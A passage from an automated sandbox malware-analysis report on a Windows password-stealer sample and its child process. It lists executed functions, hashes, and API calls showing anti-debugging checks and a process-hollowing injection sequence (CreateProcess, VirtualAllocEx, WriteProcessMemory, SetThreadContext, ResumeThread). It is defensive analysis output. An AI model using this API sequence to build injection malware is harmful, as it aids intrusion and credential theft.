Opcode ID: 8b1d71d0f981883616161a29cce988144b8b213821d913d21a39b706fa5bb205
Instruction ID: 4fec486e575d5a679f661980c84a84b5dd043919ea9e40087efe10c4c4d8c9f7
Opcode Fuzzy Hash: 8b1d71d0f981883616161a29cce988144b8b213821d913d21a39b706fa5bb205
Instruction Fuzzy Hash: 1A41FC71D0A6688FEB29CF678C103D9BBF2AFC9300F04C1AAD548A6366D7340645CF55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exePID: 7276, Parent PID: 5244COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23.1%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 030D70A8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 030D711F

Memory Dump Source

Source File: 00000009.00000002.3368331504.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_SecuriteInfo.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: aa54db8649fbaa9a464d32a488a70389123f97d546a1b51bc4681e4a9181c2e8
Instruction ID: 3a5c13e09d112884da4ba307a470c8e6d33ddce74034310d9b456f882a3ded20
Opcode Fuzzy Hash: aa54db8649fbaa9a464d32a488a70389123f97d546a1b51bc4681e4a9181c2e8
Instruction Fuzzy Hash: 182137B19012598FCB10CFAAD884BEEFBF4EF49320F14845AE459A3250D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 030D70A0 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 030D711F

Memory Dump Source

Source File: 00000009.00000002.3368331504.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_SecuriteInfo.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 080155ba4dd06bdf95237efdaea953489f004beb7a2f06d1f851f18452c0abeb
Instruction ID: 82cf174f9c733f939b06db2e9f9fb38b55069c468ff350ae7cd55fb91441d38a
Opcode Fuzzy Hash: 080155ba4dd06bdf95237efdaea953489f004beb7a2f06d1f851f18452c0abeb
Instruction Fuzzy Hash: 5A2136B59012598FCB10CFAAD484BEEFBF8EF59320F14845AE458A3251D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06FDDBF0 Relevance: 1.5, APIs: 1, Instructions: 47
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 06FDDC4D

Memory Dump Source

Source File: 00000009.00000002.3380614903.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6fd0000_SecuriteInfo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3454cecb52a7b5efc9a0dfb9290b1add5b83d4db71d8b8920ba7868361398d55
Instruction ID: 6fdae168874184ed73283680a875840a620f73caff9fdace6ff78c0dd7af42e5
Opcode Fuzzy Hash: 3454cecb52a7b5efc9a0dfb9290b1add5b83d4db71d8b8920ba7868361398d55
Instruction Fuzzy Hash: 751115B5D003488FDB20DF9AD584BDEFBF8EB48324F24841AD559A3610C778A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06FDCD60 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 06FDDC4D

Memory Dump Source

Source File: 00000009.00000002.3380614903.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6fd0000_SecuriteInfo.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: a2ca1cc1e58e5d94517ec3ef375e8b11ee59f4071c785dd400361db1863723a8
Instruction ID: b225900f1b61765f7f0f736f883e7290295c681b6736b4318835bd93bb82cccc
Opcode Fuzzy Hash: a2ca1cc1e58e5d94517ec3ef375e8b11ee59f4071c785dd400361db1863723a8
Instruction Fuzzy Hash: 681112B5D007488FCB20DFAAD588BDEBBF8EF48324F248459D518A7210D779A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0189D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3367694728.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_189d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbcf3ec9ff621a86d517775289fee7907f3735dcf0b444aefd06ac59156ecb9d
Instruction ID: bda60fa0dd74ef3fcc88b4959c2830e1fee85478359bda303f3c5632d29e52fb
Opcode Fuzzy Hash: fbcf3ec9ff621a86d517775289fee7907f3735dcf0b444aefd06ac59156ecb9d
Instruction Fuzzy Hash: 0A212271504204DFDF15DF98D9C0B26BFA5FB88318F28C66DD90A8B256C33AD506CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0189D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3367694728.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_189d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: ededfaf6699cb7d26a0eb8529dfa86478d5ea06d8dfeef58f5df12ccab59092f
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: E911BB75504280CFDB12CF58D5C4B15FFA1FB88314F28C6AAD8498B656C33AD44ACB62

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lnYkIr.exePID: 7344, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	184
Total number of Limit Nodes:	15

Executed Functions

Function 0176E158 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0176E1D6
GetCurrentThread.KERNEL32 ref: 0176E213
GetCurrentProcess.KERNEL32 ref: 0176E250
GetCurrentThreadId.KERNEL32 ref: 0176E2A9

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 36408f54deecff0d0046cc7b74a7de95e488ad7362f2fca48e54218881c9dc50
Instruction ID: 9c628a6d7714a741e23c8b05d4b4e14cb0d7243a6026247e122ac9f262b5ad39
Opcode Fuzzy Hash: 36408f54deecff0d0046cc7b74a7de95e488ad7362f2fca48e54218881c9dc50
Instruction Fuzzy Hash: AD5167B49016498FDB14DFAAD548BDEFBF5FF48304F208459D409A7350DB386944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0768C424 Relevance: 1.8, APIs: 1, Instructions: 255
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0768C666

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1f7947e4eaf31f1ba85c07dc04c8da224d7bc76c9d55a3a1b3171715dd3fb6f5
Instruction ID: fd58663e3bfc1a163ffcb4fbd3a145dfd4df4a31bda761654aad5754f02d1f06
Opcode Fuzzy Hash: 1f7947e4eaf31f1ba85c07dc04c8da224d7bc76c9d55a3a1b3171715dd3fb6f5
Instruction Fuzzy Hash: 3DA14FB1D00219CFDF64DF68C841BEDBBB2BF48314F1486A9D809A7250DB749985CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0768C430 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0768C666

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1b0b8ab951ad268c1d5ea2d7de72b6d2cca9bec86119a46f6c1633889ec5de6c
Instruction ID: 64a8c2fc37c6fdf0e6c0cfd6d9b05b2e95e4150c7f431941e1fd8a2d4ef7f89d
Opcode Fuzzy Hash: 1b0b8ab951ad268c1d5ea2d7de72b6d2cca9bec86119a46f6c1633889ec5de6c
Instruction Fuzzy Hash: DA9140B1D00219CFDF54DF68C841BEDBBB2BF48314F1486A9D809A7254DB749985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01765D44 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01765E01

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 867f3c4a4f4b2a33e5d69421e44e9c9de8a284d3131e125b11179fde3330eccc
Instruction ID: 0fc878f2157679fec9e0c0d9798927a9812ebe7e532dcea4ead3ae84107ed6b3
Opcode Fuzzy Hash: 867f3c4a4f4b2a33e5d69421e44e9c9de8a284d3131e125b11179fde3330eccc
Instruction Fuzzy Hash: C341DFB0C00619CFDB24DFA9C884B9EFBB5BF49304F20856AD418AB255DB756946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01764518 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01765E01

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 05938ec8c345290939cf409b104d55cd45432c199f62e054fcd4f1464f387663
Instruction ID: 9a27a62e4854ef2c2e8923215db9b6d9b357334c89c19e1afefea3fbe984f693
Opcode Fuzzy Hash: 05938ec8c345290939cf409b104d55cd45432c199f62e054fcd4f1464f387663
Instruction Fuzzy Hash: CC41DFB0C0061DCFDB24DFA9C844B9EFBB5BF48704F20816AD408AB255DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0768C1A1 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0768C238

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ac2493e8bb5063153193d0f225a9c1f9f75db8b5515bd2406c54c5397e5c91af
Instruction ID: 1e3075cb590ec5a75a5f17eec21f3f8bb0a8b81381daef1a218d7dc44c1657d9
Opcode Fuzzy Hash: ac2493e8bb5063153193d0f225a9c1f9f75db8b5515bd2406c54c5397e5c91af
Instruction Fuzzy Hash: B23147B19003499FDB10DFA9C9857EEBFF5FF48310F10842AE919A7240D778A945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0768C1A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0768C238

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ae26abe4aa5463ac7a39a6379e4ec9fc9a61bf902de789d7580fcc2500ee0cc1
Instruction ID: 8ce37ff9fed825b5601d50661385c559012d408263e1a0cc8fa2c8db5fcee39e
Opcode Fuzzy Hash: ae26abe4aa5463ac7a39a6379e4ec9fc9a61bf902de789d7580fcc2500ee0cc1
Instruction Fuzzy Hash: 59213BB19003099FCB10DFA9C945BDEBBF5FF48310F108429E919A7250D7789944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0768C291 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0768C318

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1b8e08d940fa06518c951f260097726478404f8c9a7855e26cb6ffbb6dde7a19
Instruction ID: 8a5388278969f08014e35b0b07e6f84c7251a1976a4e21e6bd31bbb82f6e50f3
Opcode Fuzzy Hash: 1b8e08d940fa06518c951f260097726478404f8c9a7855e26cb6ffbb6dde7a19
Instruction Fuzzy Hash: B0212AB1C003599FCB10DFAAD945AEEFBF5FF48310F50842AE519A7650C738A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0768C008 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0768C08E

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: db3b69b00608ff973cc001447d1f6dd4ef3b68a95d7214ef0584adb3166e8c42
Instruction ID: 2167e98d72774494a629726e733ca58346768f615ce35a801014a071d84992a9
Opcode Fuzzy Hash: db3b69b00608ff973cc001447d1f6dd4ef3b68a95d7214ef0584adb3166e8c42
Instruction Fuzzy Hash: 012137B19003099FDB10DFAAC5857AEBFF4EF48324F14842AD559A7240CB79A985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0768C298 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0768C318

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9aed151fb110371e27f88348ea7ce27855b9243e13edd44f643ed8f1711e1703
Instruction ID: 65706a1e1c1a2ea7c299c6d1c60005b1a5a744da19335111b7e390b2f0080630
Opcode Fuzzy Hash: 9aed151fb110371e27f88348ea7ce27855b9243e13edd44f643ed8f1711e1703
Instruction Fuzzy Hash: 4B2118B1C003599FCB10DFAAC985AEEFBF5FF48310F50842AE519A7250D778A945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0768C010 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0768C08E

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1409e02399637dc29c529b389562a3b2fd20c0d28ee64fda97a2e32ce3b6c12f
Instruction ID: 346e72eadbf1ea6e3fc7cc7b74caccc465345f049e53578d74be6a2e0d42d191
Opcode Fuzzy Hash: 1409e02399637dc29c529b389562a3b2fd20c0d28ee64fda97a2e32ce3b6c12f
Instruction Fuzzy Hash: 242129B1D003098FDB50DFAAC5857EEBBF5EF48314F148429D519A7240DB79A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0176E3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176E427

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 62f8ac432c57fa58063ea3382fdf2f47620f256e22974a717f1fe37a1283851e
Instruction ID: fa118bb69e93e9d5ad71a1e0ebc517829cc676be66a0293f182ee4f295d14581
Opcode Fuzzy Hash: 62f8ac432c57fa58063ea3382fdf2f47620f256e22974a717f1fe37a1283851e
Instruction Fuzzy Hash: 2221D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0768C0E0 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0768C156

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1e7acacc2a6a1d9dbff9732d32238d7bfb39406bcd35d916192d93628eacdb0a
Instruction ID: a2d8d2564cafbb4b315b25534cc19eedc2b83f76627f4c7805f0dd3cb0dfefc2
Opcode Fuzzy Hash: 1e7acacc2a6a1d9dbff9732d32238d7bfb39406bcd35d916192d93628eacdb0a
Instruction Fuzzy Hash: C721DEB18003498FCF10EFAAC845ADFBFF5EF48310F208859D559A7250C7399940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0768BF58 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0768BFC2

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d4f507727eecd683e690591f98e560fdfe16ba82918ef112fc2431d57faef93b
Instruction ID: 5e7396bfdd2cb8b07481143b2b1e4ba45e44897fe3102da40a397140086b2eec
Opcode Fuzzy Hash: d4f507727eecd683e690591f98e560fdfe16ba82918ef112fc2431d57faef93b
Instruction Fuzzy Hash: 2E119AB18043498FCB20DFAAC4456AEFFF5EF49320F24885DC559A7240C738A844CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0176B910 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0176C1A1,00000800,00000000,00000000), ref: 0176C3B2

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 319527caa2fd04e5647775462c4680ed2f45bcbd8ad4b763b71da6223829420b
Instruction ID: c0edb1d5ce4a0661b058368a6acdd5e50e7198e1fab76cc3333f8351ada46659
Opcode Fuzzy Hash: 319527caa2fd04e5647775462c4680ed2f45bcbd8ad4b763b71da6223829420b
Instruction Fuzzy Hash: DC1126B68003488FDB10DF9AD844ADEFBF8EB48310F10842ED959A7200C379AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0768C0E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0768C156

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7788bd2e789439e3c1c2f32f208ffa704197c0cfd357327a3616104c71ba55c4
Instruction ID: 26dc6f37dc40e417d4ad95273d4b1340d6dce5564dc389ed9326cc72536836fc
Opcode Fuzzy Hash: 7788bd2e789439e3c1c2f32f208ffa704197c0cfd357327a3616104c71ba55c4
Instruction Fuzzy Hash: FC1149B18002499FCB10DFAAC844AEFBFF5EF48320F108819E519A7250C779A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0768FE28 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0768FE8D

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 25ff9ed79c8ac34ac3628c0e96ec3582e62186c294f26ccb3db5d9082d34d984
Instruction ID: 4c470a21af0deb8000eaccedf5f43bfb961f729960e0f054b28f9356e1d6bc7b
Opcode Fuzzy Hash: 25ff9ed79c8ac34ac3628c0e96ec3582e62186c294f26ccb3db5d9082d34d984
Instruction Fuzzy Hash: E91146B1800249AFDB10DF99D448BEEBFF8EB08314F20855AD514B7201C379A540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0768BF60 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0768BFC2

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: df83ea39ee7cf406ed0818a9ba87fe3ae03ea880e7633033958491296b9a56e5
Instruction ID: 8cbe1971d3b7f0914f51befd3ad1794928523a71adcaf4a380212ae67d5ac2c4
Opcode Fuzzy Hash: df83ea39ee7cf406ed0818a9ba87fe3ae03ea880e7633033958491296b9a56e5
Instruction Fuzzy Hash: 11113AB1D002498FCB10DFAAD4457AFFBF5EF88324F248819D519A7240CB79A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0176C0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0176C126

Memory Dump Source

Source File: 0000000A.00000002.2185451064.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1760000_lnYkIr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 532df4ec40cde0c1fade373506d39cab0c8fb6a369ee47f5f966a3450a49fe52
Instruction ID: 43132fea2a062e2ab75d35389e74074c95574c135114c85897e9032f59ce49d1
Opcode Fuzzy Hash: 532df4ec40cde0c1fade373506d39cab0c8fb6a369ee47f5f966a3450a49fe52
Instruction Fuzzy Hash: 32110FB6C00249CFDB14DF9AD844A9EFBF8AB89214F10842AD958B7200C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0768D568 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0768FE8D

Memory Dump Source

Source File: 0000000A.00000002.2190569420.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7680000_lnYkIr.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 066fd22ccf9ddabb408fe6bbb23c12ffb604a6ecab60556ee46b21b0a6da93bd
Instruction ID: 1cad0cfcd0d9cb734b976209eb21fd4306647a5f54b132c1d76a1478b00c4653
Opcode Fuzzy Hash: 066fd22ccf9ddabb408fe6bbb23c12ffb604a6ecab60556ee46b21b0a6da93bd
Instruction Fuzzy Hash: 4E1106B58003499FCB10EF99D448BEEBBF8EB48314F10845AE519A7201C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0A6801D8 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e665d3c82c6939412864b6c84743afaa5feb07b965c32ff60daf0c8b6e17412
Instruction ID: 5443f14a70203795e1c084d00473eb3f8b9e9ebc3167a57b5062662ec05cfe25
Opcode Fuzzy Hash: 7e665d3c82c6939412864b6c84743afaa5feb07b965c32ff60daf0c8b6e17412
Instruction Fuzzy Hash: C1B1B170B012089FCB14EFA8D594AAEBBFAAF89300F214569E505EB3A1CB70DD05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 016BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d6a7b92563b368c2f4856ec86bc00f1d45b7fb465c0122ac99dea71543f5e1
Instruction ID: e420c7a0c34e410e3cc206e527bd40483940b418f5ef9faa4629d1c6ddf4b38b
Opcode Fuzzy Hash: 81d6a7b92563b368c2f4856ec86bc00f1d45b7fb465c0122ac99dea71543f5e1
Instruction Fuzzy Hash: 0221F471500204DFDB05DF58D9C0B96BF65FB98318F20C569D9090F356C33AE496C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 016CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2185117980.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_16cd000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59fae2bcd499bba05b62f7315c9825cc52ff476994d2c4ae065e73fda68891cb
Instruction ID: 4ddfd5d351d26c735ea07dbdcbc4118c33feb844cc2e17bb747f5c68b323b9b4
Opcode Fuzzy Hash: 59fae2bcd499bba05b62f7315c9825cc52ff476994d2c4ae065e73fda68891cb
Instruction Fuzzy Hash: 5A210071604200DFCB15DF68D980B26BFA5FB88714F20C57DD90A4B396C33AD407CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0A680100 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb548d43bb255c59010fcbfd9f8f97e53ae70153249b8983c97abc3cb200283
